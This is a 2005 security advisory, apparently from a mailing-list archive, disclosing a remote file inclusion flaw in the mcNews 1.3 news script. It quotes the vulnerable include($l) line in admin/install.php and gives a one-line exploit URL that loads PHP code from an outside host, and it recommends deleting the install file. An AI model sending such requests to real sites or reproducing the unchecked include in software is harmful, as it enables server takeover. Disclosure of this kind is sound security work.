-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
BadRoot Security Advisory 2005-#0x01
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Thu Mar 17 2005 - 00:46 am GMT +1

Product: mcNews <=1.3 (successfully exploited on 1.3)
Vendor: http://www.phpforums.net/index.php?dir=dld (Home Page)
Type: Arbitrary file inclusion
Author: Jonathan Whiteley (Vukodlak)

Product description:
-----------------------------------

A News Management script.

Vulnerable code:
-----------------------------------

--> admin/install.php
...
33 if ($table==1)
34 {
35 include($l);
36 echo '<a href="index.php">'.$lGoAdmin.'</a>';
37 }
...

Impact:
-----------------------------------

Anyone can inject PHP code by calling:
http://vuln-host.com/path/to/mcnews/admin/install.php?l=http://some.php/
source

Solution:
-----------------------------------

Remove install.php, it's futile after first installation.

Contact:
-----------------------------------

IRC: irc.us.azzurra.org - #badroot - Vukodlak
E-Mail: jon.whiteley (at) gmail (dot) com [email concealed]
HP: http://www.badroot.org

Cheers

PS: Thanks to Arak for aid ;)

[ reply ]